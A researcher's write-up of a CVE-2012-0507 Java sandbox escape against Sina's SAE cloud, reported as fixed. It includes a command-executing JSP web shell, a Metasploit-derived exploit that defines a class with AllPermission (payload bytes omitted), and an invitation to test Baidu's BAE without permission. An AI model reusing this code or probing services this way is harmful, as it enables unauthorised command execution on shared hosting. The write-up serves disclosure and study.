SAE Cloud Service Security Sandbox Bypass

Source: Internet
Author: User

Ps: This vulnerability has been fixed by Sina.
Summary
Sina's cloud service (SAE) provides PHP, Java and other runtime environments in which users build websites on a shared cloud. To prevent a malicious user from launching DDoS attacks from the cloud, or from attacking other tenants once one site has been hacked, security restrictions must be imposed: at least some sensitive functions must not be callable. Java has a mature solution for this requirement, the security sandbox, which restricts many operations. Java itself, however, has vulnerabilities. This year CVE-2012-0507 was published, a bypass of the Java security sandbox; according to news reports it was used to hack Apple computers. The technique behind the vulnerability has been analyzed abroad and also in China. Although the author still has some doubts, they have not been pursued in depth, so the principle will not be elaborated here. The purpose of this article is to apply the vulnerability in a different scenario.
Body
As mentioned above, this vulnerability bypasses the Java sandbox, and attackers used it to bypass the applet sandbox, which is how some Apple computers were hacked. When a browser visits a website, it runs any applet the page carries. The applet sandbox is built from the SecurityManager combined with a policy file; once the sandbox is bypassed, an attacker can execute arbitrary code (if it is not bypassed, only limited, harmless code can run). With a working exploit, a reverse connection and the like become possible.
Since this vulnerability bypasses a sandbox, in theory it should not be limited to the applet sandbox. As far as the author knows, there is another place where a Java sandbox is used: the much-discussed cloud. Examples are GAE, SAE, BAE and other cloud services that allow Java websites but impose many restrictions.
Let us start with SAE (fixed by the time this article was published). SAE is currently still in its test phase and requires an invitation code. First, let us look at the limitations of the sandbox.
SAE sandbox:
For example, to execute a system command, the Runtime.exec function must not be callable. The following code tests this and shows the restriction message.
<%@ page import="msf.x.*, java.io.*, java.util.concurrent.atomic.AtomicReferenceArray" %>
<%
java.lang.Process process = null;
// Ask the JRE to spawn a process; under the sandbox the SecurityManager vetoes this call
process = Runtime.getRuntime().exec(request.getParameter("cmd"));
ByteArrayOutputStream resultOutStream = new ByteArrayOutputStream();
InputStream processInStream = new BufferedInputStream(process.getInputStream());
BufferedReader buffer = new java.io.BufferedReader(new java.io.InputStreamReader(processInStream));
String strresult = "";
String result = "";
// Collect the process output line by line
while ((strresult = buffer.readLine()) != null) {
    result += strresult;
}
%><%= result %><%
processInStream.close();
processInStream = null;
resultOutStream.close();
resultOutStream = null;
%>
After uploading it, request:
http://1.javasec.sinaapp.com/cmd.jsp?cmd=ls -l
The result page shows insufficient permissions:
 

This is the classic message for a sandbox permission restriction, whether in the applet sandbox or in the cloud sandbox.
CVE-2012-0507 can be used here.
Let us go over the code. Someone in China has already translated the principle.
Bypass3.jsp: this file deserializes the payload and then calls the doWork function of the Help class:
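To make the restriction concrete, here is an added example (not code from the original article or from SAE) showing how a SecurityManager denies Runtime.exec and how a page can tell a blocked call from a successful one. It assumes a JRE that still supports SecurityManager (Java 8 to 17; on Java 18 and later start the JVM with -Djava.security.manager=allow) and the hypothetical class name ExecSandboxDemo.

```java
import java.io.FilePermission;
import java.io.IOException;
import java.security.AccessControlException;
import java.security.Permission;

/**
 * Added example, not from the original article: a minimal SecurityManager
 * that denies process execution, mirroring the "insufficient permissions"
 * message the SAE sandbox returns for Runtime.exec.
 * Assumption: the JRE still honours System.setSecurityManager.
 */
public class ExecSandboxDemo {

    /**
     * Runtime.exec calls SecurityManager.checkExec, which checks a
     * FilePermission with the "execute" action. Denying only that action
     * blocks process creation while leaving everything else permitted,
     * which keeps the demo self-contained.
     */
    static class NoExecSecurityManager extends SecurityManager {
        @Override
        public void checkPermission(Permission perm) {
            if (perm instanceof FilePermission
                    && perm.getActions().contains("execute")) {
                throw new AccessControlException("access denied: " + perm);
            }
            // every other permission is allowed in this demo
        }

        @Override
        public void checkPermission(Permission perm, Object context) {
            checkPermission(perm);
        }
    }

    /** Returns a description of the outcome so a caller can see whether the sandbox held. */
    static String tryExec(String command) {
        try {
            Process p = Runtime.getRuntime().exec(command);
            p.destroy();
            return "EXECUTED (no sandbox in effect)";
        } catch (AccessControlException e) {
            // This is the branch a sandboxed page ends up in
            return "BLOCKED by SecurityManager: " + e.getMessage();
        } catch (IOException e) {
            // e.g. the command does not exist on this platform
            return "IO error: " + e.getMessage();
        }
    }

    public static void main(String[] args) {
        System.out.println("Without sandbox: " + tryExec("ls"));
        System.setSecurityManager(new NoExecSecurityManager());
        System.out.println("With sandbox:    " + tryExec("ls"));
    }
}
```

Compile with `javac ExecSandboxDemo.java` and run with `java ExecSandboxDemo`; the second line is the AccessControlException branch, which is the same kind of denial the cmd.jsp test above reports on SAE. A real container policy is expressed in a policy file rather than a hand-written manager, but the check that fires is the same FilePermission "execute" check.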
<%
try {
    // Serialized payload bytes omitted by the author ("can be found by google")
    byte[] arrayOfByte = { };
    ObjectInputStream localObjectInputStream = new ObjectInputStream(new ByteArrayInputStream(arrayOfByte));
    Object[] arrayOfObject = (Object[]) localObjectInputStream.readObject();
    Help[] arrayOfHelp = (Help[]) arrayOfObject[0];
    AtomicReferenceArray localAtomicReferenceArray = (AtomicReferenceArray) arrayOfObject[1];
    ClassLoader localClassLoader = getClass().getClassLoader();
    // CVE-2012-0507: the AtomicReferenceArray shares its backing array with arrayOfHelp,
    // so set() stores the ClassLoader into a Help[] slot without a type check
    localAtomicReferenceArray.set(0, localClassLoader);
    Help localHelp = arrayOfHelp[0];
%><%= Help.doWork(localHelp, request.getParameter("cmd").toString()) %><%
} catch (Exception e) {
}
%>
This code calls into the Help class; its doWork method is as follows:
// Help extends ClassLoader; doWork is called from bypass3.jsp above.
// Required imports: java.lang.reflect.Field, java.net.URL,
// java.security.cert.Certificate, java.security.*
public static String doWork(Help paramHelp, String cmd) throws Exception {
    String String1 = "ExpFile"; // This is the class name of expfile.class
    Class localClass = null;
    byte[] classData1 = { -54, -2, -70, -66, 0, 0, 0, 50, 0 ...
        /* Contents of expfile.class as a byte array: read the file directly and dump its bytes */ };
    URL localURL = new URL("file:///");
    Certificate[] arrayOfCertificate = new Certificate[0];
    Permissions localPermissions = new Permissions();
    localPermissions.add(new AllPermission());
    // The defined class is given AllPermission, which is what escapes the sandbox
    ProtectionDomain localProtectionDomain = new ProtectionDomain(
        new CodeSource(localURL, arrayOfCertificate), localPermissions);
    try {
        // Reuse the class if this loader has already defined it
        Class c = paramHelp.loadClass(String1);
        localClass = c;
    } catch (Exception e) {
        localClass = paramHelp.defineClass(String1, classData1, 0, classData1.length, localProtectionDomain);
    }
    Field localField1 = localClass.getField("data");
    localField1.set(localClass, cmd);
    paramHelp = null;
    if (localClass != null) {
        localClass.newInstance();
    }
    Field localFieldresult = localClass.getField("cmdresult");
    String sresult = localFieldresult.get(localClass).toString();
    return sresult;
}
ExpFile simply executes the command and collects the result, so its source is not released here.
This code comes from the MSF framework, with the following part modified:
try {
    Class c = paramHelp.loadClass(String1);
    localClass = c;
} catch (Exception e) {
    localClass = paramHelp.defineClass(String1, classData1, 0, classData1.length, localProtectionDomain);
}
This is a very important detail. The code generated by the MSF framework runs once in an applet; that is enough to open a reverse connection, download an executable, and so on, and no exception occurs. Even when the page is opened again, execution starts from scratch. In a web container, however, the code usually has to run many times and the container's class loader is not restarted, so exceptions are inevitable.
Principle:
paramHelp is an object that inherits from ClassLoader. When defineClass is executed a second time, the same class (ExpFile here) is loaded twice. A Java class loader does not allow the same class to be defined twice, so an error is reported. To solve this, a try/catch structure is used: if the current class loader has already loaded ExpFile, that class is used directly instead of being defined again. Only after solving this can the MSF code originally written for applets be executed repeatedly on the web. Otherwise the outcome is always the same: the first request to the page succeeds and the second one errors.
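The duplicate-definition behaviour described above, as an added example that is not part of the original article: a throwaway class loader defines a harmless nested class twice and hits the LinkageError, then a second loader uses findLoadedClass as the guard so repeated calls return the already-loaded class. The class names DupDemo and Marker are assumptions; it needs Java 9 or later for InputStream.readAllBytes and expects the compiled DupDemo$Marker.class to sit beside DupDemo.class on the classpath.

```java
import java.io.IOException;
import java.io.InputStream;

/**
 * Added example, not from the original article: why a class loader rejects a
 * second defineClass of the same name, and the findLoadedClass guard that a
 * long-lived web container class loader requires.
 * Assumptions: Java 9+, DupDemo$Marker.class available as a classpath resource.
 */
public class DupDemo {

    /** Harmless class whose bytes are defined into a custom loader. */
    public static class Marker { }

    /** Minimal loader that exposes defineClass, with and without a reload guard. */
    static class OnceLoader extends ClassLoader {
        OnceLoader() {
            super(DupDemo.class.getClassLoader());
        }

        /** Naive: defines the class every time; the second call fails. */
        Class<?> defineRaw(String name, byte[] b) {
            return defineClass(name, b, 0, b.length);
        }

        /** Guarded: reuse the class this loader already defined. */
        Class<?> defineOnce(String name, byte[] b) {
            Class<?> c = findLoadedClass(name);
            return c != null ? c : defineClass(name, b, 0, b.length);
        }
    }

    /** Reads the bytecode of the nested Marker class from the classpath. */
    static byte[] markerBytes() throws IOException {
        try (InputStream in = DupDemo.class.getResourceAsStream("DupDemo$Marker.class")) {
            if (in == null) {
                throw new IOException("DupDemo$Marker.class not found on the classpath");
            }
            return in.readAllBytes();
        }
    }

    public static void main(String[] args) throws IOException {
        String name = "DupDemo$Marker";
        byte[] bytes = markerBytes();

        // Same loader, same name, twice: the JVM refuses the duplicate definition
        OnceLoader naive = new OnceLoader();
        naive.defineRaw(name, bytes);
        try {
            naive.defineRaw(name, bytes);
        } catch (LinkageError e) {
            System.out.println("second defineClass failed: " + e.getMessage());
        }

        // Guarded loader: the second call returns the cached Class object
        OnceLoader guarded = new OnceLoader();
        Class<?> first = guarded.defineOnce(name, bytes);
        Class<?> second = guarded.defineOnce(name, bytes);
        System.out.println("guarded loader returned the same class: " + (first == second));
    }
}
```

Compile with `javac DupDemo.java` and run `java DupDemo`. The first block prints the "attempted duplicate class definition" LinkageError; the second prints true. The guard works because a ClassLoader records every class it has defined, and findLoadedClass consults that record without delegating to the parent, which is why a servlet container's loader, which lives for the whole deployment, must consult it before defining anything.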
The effect is as follows:
 
In this result, Runtime.exec is not allowed by the sandbox, yet the command's output is still returned. This vulnerability was reported to Sina's security staff and has been fixed; the fix is to upgrade the JRE. After the fix, the page returns null.
That is the result on SAE. BAE (Baidu's cloud) was not forthcoming and did not give me an invitation code, so I will not notify them of the vulnerability. If it is vulnerable, test it yourself.
Java has many similar vulnerabilities. Although the advisory for each vulnerability states its impact, there are actually many attack methods; one of them is extremely damaging, so people focus on that one and ignore the important information given in the original advisory. Long after this vulnerability was disclosed, Oracle released patches; we upgraded the JRE on our local machines but ignored the impact on servers.
By kxlzx http://www.inbreak.net Weibo: http://t.qq.com/javasecurity